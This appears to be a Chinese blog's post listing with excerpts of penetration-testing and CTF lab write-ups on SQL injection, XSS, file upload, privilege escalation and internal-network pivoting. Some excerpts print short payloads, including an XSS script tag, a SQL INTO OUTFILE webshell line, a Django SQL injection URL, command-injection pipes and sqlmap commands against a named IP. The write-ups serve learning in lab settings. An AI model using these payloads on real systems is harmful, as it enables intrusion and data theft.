自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(39)
  • 收藏
  • 关注

原创 vulntarget-b记录(Sliver学习)

这里尝试了 re ,毒刺,ew 都不太行(应该是我操作姿势不对)后来发现通过iox代理工具可以获取到一个稳定的流量转发隧道。vulntarget\administrator:Admin@123、(首次登陆要改密码修改为Admin@123@)把这个马子传入web服务靶机上,开启http服务,使用刚才植入的webshell利用蚁剑下载这个马子。配置浏览器代理 下图的192.168.1.104 是边界靶机IP,上边的命令也是在边界靶机中运行。发现 10.0.10.99/24 网段,而且发现处于域环境。

2024-06-04 16:56:40 928

原创 Matrix Breakout:2 Morpheus(靶机详细渗透测试过程记录)

php伪协议读文件,msf提权

2023-07-12 13:09:59 656

原创 记一次真实liunx挖矿病毒处理

一次liunx挖矿木马应急处理

2023-02-27 14:40:43 537 1

原创 PHPSTUDY xss+csrf RCE漏洞

产生的原因是,小皮面板管理后台会显示登录信息,会将用户登录失败的信息也显示出来,且未进行任何过滤。而且小皮面板有一个计划任务的功能,可以实现命令执行因此存在rce漏洞。最近小皮面板爆出来一个高位的RCE漏洞,跟风赶紧来复现一下。在用户名输入框输入xss测试语句,密码随便填登录。安装成功会弹出一个”小皮面板初始信息.txt“安装小皮面板,下载完安装包后傻瓜式一键安装。起一个http服务,构造csrf poc。在用户登录框插入xss payload。

2023-02-08 18:15:48 563

原创 红日靶场五渗透记录

一次简单的think PHP+内网环境渗透

2022-12-26 20:19:32 502

原创 DC-9靶机

针对dc-9靶机,利用已知漏洞获取最高权限的一次记录。

2022-12-01 18:29:02 315

原创 DC-6靶机CVE-2018-15877漏洞利用+nmap提权

CVE-2018-15877漏洞利用+nmap提权

2022-11-26 21:54:19 873

原创 弱口令招新赛靶机赛道WriteUp

弱口令实验室招新赛靶机赛道

2022-11-14 18:31:43 575 5

原创 burp实验室逻辑漏洞

burp实验室逻辑漏洞

2022-11-08 21:58:11 301

原创 一次从weblogic漏洞到内网渗透。

红日靶场2

2022-11-07 12:55:02 1589

原创 Typhoon-v1.02渗透笔记

利用kali对与常见的各种服务进行shll权限获取。

2022-10-27 22:40:03 1259 1

原创 IIS6.0文件上传漏洞

改为asp类型的文件后缀,会将此文件夹下的所有文件当作asp类型文件执行。可以更改此处为文件上传的文件夹。

2022-10-17 11:16:42 148

原创 内网渗透测试 MSF搭建socks代理

通过msf设置代理渗透内网不出网主机

2022-10-14 20:09:31 2738 1

原创 sql注入(sqli-labs-master)1~10

利用concat将updatexml函数和group_concat函数的字符传拼接成一条查询语句。可以盲注也可以利用updatexml函数显示错误信息来进行注入。利用group_concat函数查询所有表名。查询user和password字段。和第五关一样将单引号换成双引号。判断表长(以第四张表为例子)查看数据库名和数据库版本。查询users中的列名。查询username字段。也一样单引号和括号闭合。和第一关注入方法一样。

2022-10-05 16:08:57 327

原创 .htaccess AND .user.ini文件构成的PHP后门

比如,某网站限制不允许上传.php文件,你便可以上传一个.user.ini,再上传一个图片马,包含起来进行getshell。我的nginx服务器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fastcgi/cgi,我win下的apache上也用的fcgi,可谓很广,不像.htaccess有局限性。所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。那么什么是.user.ini?

2022-09-23 16:32:37 217

原创 利用for循环+foreach来获取数组中的最大值的下标

在 index.php 定义函数 getMax,调用该函数传入 $array ,echo输出 $array 中最大值的下标。该函数使用逻辑判断可以做到查询出任意传入的一维数组的最大值的下标。(2)在函数外部,调用该函数,参数是 $array , 将返回值赋值给变量$max。(1)定义函数 getMax,函数接受一个一维数组(值不重复)参数。该结果通过 return 方式返回。(3)输出变量$max。

2022-09-11 15:11:04 2329

原创 php foreach遍历二维数组(任意数量的子数组,子数组有任意多个键值) 求和。

在 index.php 定义函数 getSum,该函数用来计算二维数组(任意数量的子数组,子数组有任意多个键值)中所有数字之和。(1)定义函数 getSum,函数接受一个二维数组参数,将二维数组遍历取得所有数字之和。该结果通过 return 方式返回。(2)在函数外部,调用该函数,参数是 $array , 将返回值赋值给变量$sum。(3)输出变量$sum。

2022-09-11 15:07:23 653

原创 upload-labs-master本地靶场刷题笔记

文件上传漏洞,常见的绕过方式。

2022-09-05 16:34:58 414

原创 lampiao靶机-脏牛提权

dirb扫描出来很多敏感目录,泄露许多敏感信息。发现有很多漏洞,sql注入了,远程代码执行什么的。访问80端口没什么收获,访问1898端口。发现没有sudo提权可以使用的命令。Drupal7框架。拿到root账户密码。...

2022-07-18 12:16:01 1348

原创 DC-2靶机 wordpress框架渗透 +su 提权

kali内置的有WPScan是针对于wordpress网站的攻击工具。是一款采用开发的应用程序,你可以给它的爬虫指定。地址和爬取深度,还可以添额外的外部链接,接下来。显然最后一个flag在root权限中,需要提权。得到三个用户名创建user.txt写入。会给你返回一个字典文件,然后可以用于密码破解。,但具有额外的安全层来实施这些限制。靶机IP192.168.3.127。通过vi得到flag3,flag4。利用dirb进行一波敏感目录爆破。使用sudo提权中的git提权。-uuser用户名。...

2022-07-17 23:16:10 1336

原创 使用图片包含php代码 。绕过对文件内容检测的文件上传的waf

先随便新建一个图片:然后我把它放在我的kali里边。用vi查看一下内容:箭头所指的是图片的文件头格式。为了避免解析失败,将除去文件头的内容删去。.按esc输入开始到结束的行数+d可实现快速删除指定内容。 保存并退出。 在1.php中准备好代码。.cat 1.php >> 2.png 将1php的内容复制在2.png的内容后边。 现在我们用PHP解析一下 2.png代码执行成功。这样就可以绕过对文件内容检测的文件上传的waf了。仅供学习参考,请勿用于非法用途。...

2022-06-16 18:35:59 779

原创 文件上传漏洞,之00截断。

上传一个shell.png.jpg文件。然后在png后加一个空格方便再二进制查找位置。找到代表空格的20,我们将20改为00这个时候png后边就会存在一个看不见的字符。放包,使其上传。文件上传成功,成功绕过前端验证,修改了上传文件的类型。同样方法成功上传PHP文件。...

2022-06-16 16:39:05 1067

原创 记一次真实src漏洞挖掘笔记。

src漏洞挖掘遇到的问题

2022-06-15 15:02:05 778 1

原创 CTFHUB 端口扫描

题目提示内网端口扫描我们想访问内网的本机回环地址。响应码200,访问成功提示8000-9000的端口:奈何burp用的不六,治好另寻他路:我用python简单构造一个for循环脚本:函数range常用于for循环中,range() 函数可创建一个整数列表.他是左开右闭类型的。for i in range(8000,9001): print(i)此函数可以打印出8000-9000的数字。然后复制下来,放到burp里边爆破...

2022-06-09 20:28:41 778

原创 python学习 (持续更新)

2022/5/24开学pythonpython爬虫学的好,牢饭吃的早。嘿嘿基础:输出语句 print("niubi")结果 niubi也可以 print("niubi" * 8)结果:也可以增加转义字符: print("niubi\n" * 8)结果:利用python制作一个简单的游戏:很菜,程序只能运行一次。....................................

2022-05-29 15:22:37 211

原创 重置目标密码漏洞

验证码覆盖.重置个人密码时,存在多种注入攻击方式。重置密码常用手机验证码验证,这时候我们打开两个重置密码的页面,第一个用自己的账户,第二个用于目标账户。现在目标页面输入账户后点击获得验证码。再用自己账户也输入账户,点击获得验证码。随后将自己账户的验证码,输入在目标页面。服务器判断短信验证码是否正确的方法:判断POST传递的短信验证码和SESSION中传递的短信吗是否一致,如果一致则重置用户密码。当服务器端判断时,POST传递的code的值,第二个会覆盖第一个所接受的值,因此第二个的账

2022-05-15 10:54:02 157

原创 XSS漏洞详解以及绕过方式。

下列以dvwa靶场为例:反射性XSS:LOW级别<script>alert('test')</script>最基本的原理,就是前端对输入的内容过滤不严谨,是的输入的元素再html框架中得以运行。medium级别可能过滤了js标签,我们使用input标签,<input onblur=alert`1`>当input失去焦点时会触发<input onclick=alert `123'> 当input获取焦点(点击输入)时触发

2022-05-14 22:50:40 1529

原创 django-cve_2019_14234漏洞

出现报错说明语句执行成功再次构造payload因为or1=1永远为真得到所有用户http://ip:8000/admin/vuln/collection/?detail__title%27)%3d%271%27 or 1%3d1%2d%2d%20

2022-05-13 12:56:03 571

原创 命令执行漏洞,详解。

介绍漏洞:应用程序有时需要调用一些执行函数,如php中,使用system,exec,shell_exec,pasthur,popen,proc,proc_popen等函数可以执行系统命令,当黑客操控这些函数时,就可以将可以命令拼接在正常命令中,从而造成执行命令攻击。下列以dvwa靶场为例进行介绍。windows系统管道符命令;”|“:直接执行后边的语句。 例如:ping 127.0.0.1|whoami"||":如果前边的执行语句为假则执行后边的语句,前边语句只能为假。 例如:ping

2022-04-30 09:42:46 1898

原创 文件上传漏洞,详解。

为什么存在文件上传漏洞。。。:上传文件时,服务器未对,上传文件的后缀做出具体规范。导致可以上传任意的文件类型。JS 绕过检测攻击上传文件时javascirpt在客户端会对后缀名进行检测。这时候可以在burp中抓包修改后缀,绕过客户端的js检测。文件后缀 绕过检测攻击。文件后缀时服务器中的代码,对文件后缀做出了一些检测和限制。但是apache会对一些文件的后缀名允许上传。例如http.conf。如果配置中有一下代码,则能够解析成php和html文件。所以可以上传一个ph..

2022-04-29 14:57:20 1295

原创 ctf.show web3

打开题目,出现提示,php文件?,考虑文件包含漏洞。输入参数:?url=/etc/passwd这个报错界面出来了,说明存在文件包含漏洞构造url值 =php://input 使用php协议使用burp抓包使用ls命令查看php下的文件得到文件路径。。。。使用cat方法查看最终得到flag。。。。。。。。发文助手检测到文字太少,无奈再说点什么吧,信息安全渗透,学习需要一个积累的过程,需要可以不精通但最少了解 php,java,j...

2022-04-25 21:26:20 1438

原创 union注入攻击之dvwa靶场实战演练(union秒懂教程)

第一步,我们来分析是否存在字符型注入点:1、id=1 返回正常。2、id=1' 返回错误3、id=1 and 1=1 “1=1” 为真返回正常4、id=1 and 1=2 “1=2”为假返回错误。测试符合这四个条件,证明该位置存在字符型注入点漏洞。//原理分析:因为字符型的注入点不同于数字型 数字型注入点 后台的php传参点格式为 id=$字符型则为 'id=$' 有两个引号下面以dvwa靶场进行实验演示我们输入1'# 来使'i...

2022-04-19 18:43:01 1026

原创 sqlmap注入命令大全

sqlmap -u "注入点地址" --dbs扫描数据库"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomla --tables 打开数据库中的 ”joomla表格sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fiel...

2022-04-17 10:54:58 2972

原创 CTF Web_php_unserialize 详细解题过程

打开靶场地址,我们看到是一个php代码我们首先利用kali虚拟机内的dirb,获取敏感信息,扫描网站敏感文件扫描可以得出该网站下的文件,我将它复制在记事本中发现一个数据库网站获取到账号为root密码为空登录数据库,在SQL出编写一句话木马,并执行。SELECT "<?php eval(@$_POST['pass']); ?>"INTO OUTFILE '/tmp/test1.php'接下来我们使用中国蚁剑,链接我们所编写的木马,SELECT "&

2022-04-16 00:18:44 3314

原创 WEB安全之渗透第一步:信息收集

web安全,网络渗透

2022-04-13 20:06:15 196

原创 渗透第一步之DNS信息收集技巧。

正向查询:首先 最简单最快速的是,使用ping命令输入域名来获取其ip地址。或者,使用nslookup命令来指定域名获取ip地址。Server:192.168.90.83 #DNS服务器Address:192.168.90.83# #我们解析到的ip地址。Name : #我们解析的域名。或者使用,DIG命令:dig 域名dig 域名 any (加any意思为查询所有可以查询的到的)反向查询:dig -x ip地址 得出域名PTR XXXXXXX PT.

2022-04-11 13:32:01 3345

原创 sqlmap注入详解(joomla案例)

我们以该网站为例:我们需要先找到其报错注入点:再次要注意:报错注入点中的 ‘ [] ’ 符号是不能为sqlmap所识别的。我们所需要将其转换为url编码。之后进入正题打开kali并开启root权限,利用sqlmap扫描其数据库。--dbs这时候我们得到了该网站的五个表。我们进入joomla表中。-D joomla --tables之后我们进入#__users列中并指定想要获取的信息。这时候便得到了我们想要的账户,密码,以及邮箱。此密码经过加密,解密..

2022-04-01 19:50:53 2769

原创 kali之永恒之蓝使用流程(操作全套步骤)

kali之永恒之蓝使用流程

2022-04-01 17:59:00 5154 2

原创 HTML代码集

最常用,推荐使用) in(英寸) cm(厘米) mm(毫米) pt(点)。 2.font-family属性 设置字体 网页中常用的字体有宋体,微软雅黑,黑体等....。 3.font-weight属性 用于设置字体的粗细 nomal(默认值,定义标准的字符) bold(定义粗体字符) bolder(定义更粗的字符) lighter(定义更细的字符) 100-900(100的整数倍)=定义由细到粗的字符,其中400等于nomal,700等于bold,越大越粗。4.font-style属性 用于定义文字风格

2022-03-17 20:14:41 664

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除